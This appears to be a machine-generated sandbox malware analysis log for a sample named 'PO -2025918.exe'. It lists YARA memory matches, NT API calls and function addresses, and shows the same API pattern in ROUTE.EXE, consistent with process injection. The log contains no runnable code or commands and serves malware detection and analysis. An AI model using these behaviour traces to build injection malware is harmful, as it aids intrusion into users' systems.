Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0042C9C3 NtClose, 4_2_0042C9C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040AD20 NtAllocateVirtualMemory, 4_2_0040AD20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2B60 NtClose,LdrInitializeThunk, 4_2_01BD2B60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_01BD2DF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_01BD2C70
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD35C0 NtCreateMutant,LdrInitializeThunk, 4_2_01BD35C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD4340 NtSetContextThread, 4_2_01BD4340
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD4650 NtSuspendThread, 4_2_01BD4650
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BA0 NtEnumerateValueKey, 4_2_01BD2BA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2B80 NtQueryInformationFile, 4_2_01BD2B80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BF0 NtAllocateVirtualMemory, 4_2_01BD2BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2BE0 NtQueryValueKey, 4_2_01BD2BE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AB0 NtWaitForSingleObject, 4_2_01BD2AB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AF0 NtWriteFile, 4_2_01BD2AF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2AD0 NtReadFile, 4_2_01BD2AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DB0 NtEnumerateKey, 4_2_01BD2DB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2DD0 NtDelayExecution, 4_2_01BD2DD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D30 NtUnmapViewOfSection, 4_2_01BD2D30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D10 NtMapViewOfSection, 4_2_01BD2D10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2D00 NtSetInformationFile, 4_2_01BD2D00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CA0 NtQueryInformationToken, 4_2_01BD2CA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CF0 NtOpenProcess, 4_2_01BD2CF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2CC0 NtQueryVirtualMemory, 4_2_01BD2CC0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C00 NtQueryInformationProcess, 4_2_01BD2C00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2C60 NtCreateKey, 4_2_01BD2C60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FB0 NtResumeThread, 4_2_01BD2FB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FA0 NtQuerySection, 4_2_01BD2FA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F90 NtProtectVirtualMemory, 4_2_01BD2F90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2FE0 NtCreateFile, 4_2_01BD2FE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F30 NtCreateSection, 4_2_01BD2F30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2F60 NtCreateProcessEx, 4_2_01BD2F60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2EA0 NtAdjustPrivilegesToken, 4_2_01BD2EA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2E80 NtReadVirtualMemory, 4_2_01BD2E80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2EE0 NtQueueApcThread, 4_2_01BD2EE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2E30 NtWriteVirtualMemory, 4_2_01BD2E30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3090 NtSetValueKey, 4_2_01BD3090
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3010 NtOpenDirectoryObject, 4_2_01BD3010
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD39B0 NtGetContextThread, 4_2_01BD39B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3D10 NtOpenProcessToken, 4_2_01BD3D10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD3D70 NtOpenThread, 4_2_01BD3D70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03304340 NtSetContextThread,LdrInitializeThunk, 9_2_03304340
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03304650 NtSuspendThread,LdrInitializeThunk, 9_2_03304650
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302B60 NtClose,LdrInitializeThunk, 9_2_03302B60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BA0 NtEnumerateValueKey,LdrInitializeThunk, 9_2_03302BA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_03302BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302BE0 NtQueryValueKey,LdrInitializeThunk, 9_2_03302BE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AF0 NtWriteFile,LdrInitializeThunk, 9_2_03302AF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AD0 NtReadFile,LdrInitializeThunk, 9_2_03302AD0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F30 NtCreateSection,LdrInitializeThunk, 9_2_03302F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FB0 NtResumeThread,LdrInitializeThunk, 9_2_03302FB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FE0 NtCreateFile,LdrInitializeThunk, 9_2_03302FE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302E80 NtReadVirtualMemory,LdrInitializeThunk, 9_2_03302E80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302EE0 NtQueueApcThread,LdrInitializeThunk, 9_2_03302EE0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D30 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_03302D30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D10 NtMapViewOfSection,LdrInitializeThunk, 9_2_03302D10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03302DF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DD0 NtDelayExecution,LdrInitializeThunk, 9_2_03302DD0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C70 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_03302C70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C60 NtCreateKey,LdrInitializeThunk, 9_2_03302C60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CA0 NtQueryInformationToken,LdrInitializeThunk, 9_2_03302CA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033035C0 NtCreateMutant,LdrInitializeThunk, 9_2_033035C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033039B0 NtGetContextThread,LdrInitializeThunk, 9_2_033039B0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302B80 NtQueryInformationFile, 9_2_03302B80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302AB0 NtWaitForSingleObject, 9_2_03302AB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F60 NtCreateProcessEx, 9_2_03302F60
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302FA0 NtQuerySection, 9_2_03302FA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302F90 NtProtectVirtualMemory, 9_2_03302F90
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302E30 NtWriteVirtualMemory, 9_2_03302E30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302EA0 NtAdjustPrivilegesToken, 9_2_03302EA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302D00 NtSetInformationFile, 9_2_03302D00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302DB0 NtEnumerateKey, 9_2_03302DB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302C00 NtQueryInformationProcess, 9_2_03302C00
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CF0 NtOpenProcess, 9_2_03302CF0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03302CC0 NtQueryVirtualMemory, 9_2_03302CC0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303010 NtOpenDirectoryObject, 9_2_03303010
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303090 NtSetValueKey, 9_2_03303090
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303D10 NtOpenProcessToken, 9_2_03303D10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03303D70 NtOpenThread, 9_2_03303D70
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB91D0 NtCreateFile, 9_2_00AB91D0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9340 NtReadFile, 9_2_00AB9340
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB94D0 NtClose, 9_2_00AB94D0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9430 NtDeleteFile, 9_2_00AB9430
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AB9640 NtAllocateVirtualMemory, 9_2_00AB9640
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0254E0CC 0_2_0254E0CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07075D40 0_2_07075D40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070768B0 0_2_070768B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707D6A0 0_2_0707D6A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707D6C0 0_2_0707D6C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707F5C8 0_2_0707F5C8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707F5D8 0_2_0707F5D8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DF20 0_2_0707DF20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DF30 0_2_0707DF30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07074B20 0_2_07074B20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07074B30 0_2_07074B30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707FA10 0_2_0707FA10
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707DAF8 0_2_0707DAF8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707683F 0_2_0707683F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_0707689F 0_2_0707689F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070875E8 0_2_070875E8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07089F50 0_2_07089F50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_07084590 0_2_07084590
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 0_2_070875E2 0_2_070875E2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004188C3 4_2_004188C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004100DA 4_2_004100DA
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_004100E3 4_2_004100E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401240 4_2_00401240
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00403230 4_2_00403230
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00416AD0 4_2_00416AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00416AD3 4_2_00416AD3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E2E3 4_2_0040E2E3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401B40 4_2_00401B40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00410303 4_2_00410303
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00401B36 4_2_00401B36
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E427 4_2_0040E427
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040E433 4_2_0040E433
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0040264C 4_2_0040264C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00402650 4_2_00402650
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_00402669 4_2_00402669
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_0042EFC3 4_2_0042EFC3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C581CC 4_2_01C581CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C541A2 4_2_01C541A2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C601AA 4_2_01C601AA
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C28158 4_2_01C28158
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90100 4_2_01B90100
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3A118 4_2_01C3A118
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C32000 4_2_01C32000
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C603E6 4_2_01C603E6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE3F0 4_2_01BAE3F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A352 4_2_01C5A352
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C202C0 4_2_01C202C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40274 4_2_01C40274
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C60591 4_2_01C60591
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0535 4_2_01BA0535
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4E4F6 4_2_01C4E4F6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C52446 4_2_01C52446
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44420 4_2_01C44420
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9C7C0 4_2_01B9C7C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4750 4_2_01BC4750
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBC6E0 4_2_01BBC6E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6A9A6 4_2_01C6A9A6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B868B8 4_2_01B868B8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCE8F0 4_2_01BCE8F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAA840 4_2_01BAA840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA2840 4_2_01BA2840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C56BD7 4_2_01C56BD7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5AB40 4_2_01C5AB40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB8DBF 4_2_01BB8DBF
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9ADE0 4_2_01B9ADE0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAAD00 4_2_01BAAD00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3CD1F 4_2_01C3CD1F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90CF2 4_2_01B90CF2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C40CB5 4_2_01C40CB5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0C00 4_2_01BA0C00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1EFA0 4_2_01C1EFA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B92FC8 4_2_01B92FC8
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C14F40 4_2_01C14F40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0F30 4_2_01BC0F30
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE2F28 4_2_01BE2F28
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5EEDB 4_2_01C5EEDB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2E90 4_2_01BB2E90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5CE93 4_2_01C5CE93
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0E59 4_2_01BA0E59
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5EE26 4_2_01C5EE26
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAB1B0 4_2_01BAB1B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C6B16B 4_2_01C6B16B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8F172 4_2_01B8F172
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD516C 4_2_01BD516C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4F0CC 4_2_01C4F0CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F0E0 4_2_01C5F0E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C570E9 4_2_01C570E9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA70C0 4_2_01BA70C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE739A 4_2_01BE739A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5132D 4_2_01C5132D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8D34C 4_2_01B8D34C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA52A0 4_2_01BA52A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C412ED 4_2_01C412ED
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBD2F0 4_2_01BBD2F0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBB2C0 4_2_01BBB2C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C695C3 4_2_01C695C3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3D5B0 4_2_01C3D5B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57571 4_2_01C57571
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B91460 4_2_01B91460
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F43F 4_2_01C5F43F
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5F7B0 4_2_01C5F7B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C516CC 4_2_01C516CC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE5630 4_2_01BE5630
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C35910 4_2_01C35910
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA9950 4_2_01BA9950
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBB950 4_2_01BBB950
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA38E0 4_2_01BA38E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0D800 4_2_01C0D800
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C15BF0 4_2_01C15BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBFB80 4_2_01BBFB80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BDDBF9 4_2_01BDDBF9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FB76 4_2_01C5FB76
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C4DAC6 4_2_01C4DAC6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE5AA0 4_2_01BE5AA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C41AA3 4_2_01C41AA3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3DAAC 4_2_01C3DAAC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57A46 4_2_01C57A46
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FA49 4_2_01C5FA49
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C13A6C 4_2_01C13A6C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBFDC0 4_2_01BBFDC0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C51D5A 4_2_01C51D5A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C57D73 4_2_01C57D73
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA3D40 4_2_01BA3D40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FCF2 4_2_01C5FCF2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C19C32 4_2_01C19C32
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA1F92 4_2_01BA1F92
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B63FD5 4_2_01B63FD5
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B63FD2 4_2_01B63FD2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FFB1 4_2_01C5FFB1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5FF09 4_2_01C5FF09
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA9EB0 4_2_01BA9EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338A352 9_2_0338A352
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DE3F0 9_2_032DE3F0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033903E6 9_2_033903E6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03370274 9_2_03370274
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033502C0 9_2_033502C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C0100 9_2_032C0100
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0336A118 9_2_0336A118
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03358158 9_2_03358158
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033901AA 9_2_033901AA
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033841A2 9_2_033841A2
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_033881CC 9_2_033881CC
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03362000 9_2_03362000
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0770 9_2_032D0770
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032F4750 9_2_032F4750
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032CC7C0 9_2_032CC7C0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032EC6E0 9_2_032EC6E0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D0535 9_2_032D0535
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03390591 9_2_03390591
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03374420 9_2_03374420
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03382446 9_2_03382446
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0337E4F6 9_2_0337E4F6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338AB40 9_2_0338AB40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03386BD7 9_2_03386BD7
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032CEA80 9_2_032CEA80
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032E6962 9_2_032E6962
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D29A0 9_2_032D29A0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0339A9A6 9_2_0339A9A6
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032D2840 9_2_032D2840
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032DA840 9_2_032DA840
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032B68B8 9_2_032B68B8
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032FE8F0 9_2_032FE8F0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03372F30 9_2_03372F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03312F28 9_2_03312F28
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032F0F30 9_2_032F0F30
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_03344F40 9_2_03344F40
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0334EFA0 9_2_0334EFA0
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_032C2FC8 9_2_032C2FC8
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_0338EE26 9_2_0338EE26
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01C1F290 appears 102 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01C0EA12 appears 86 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01BD5130 appears 58 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01B8B970 appears 262 times
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: String function: 01BE7E54 appears 106 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 03305130 appears 58 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 032BB970 appears 262 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 0334F290 appears 103 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 03317E54 appears 107 times
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: String function: 0333EA12 appears 86 times
Source: PO -2025918.exe, 00000000.00000002.1864286596.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO -2025918.exe
Source: PO -2025918.exe, 00000000.00000002.1865271514.0000000002751000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO -2025918.exe
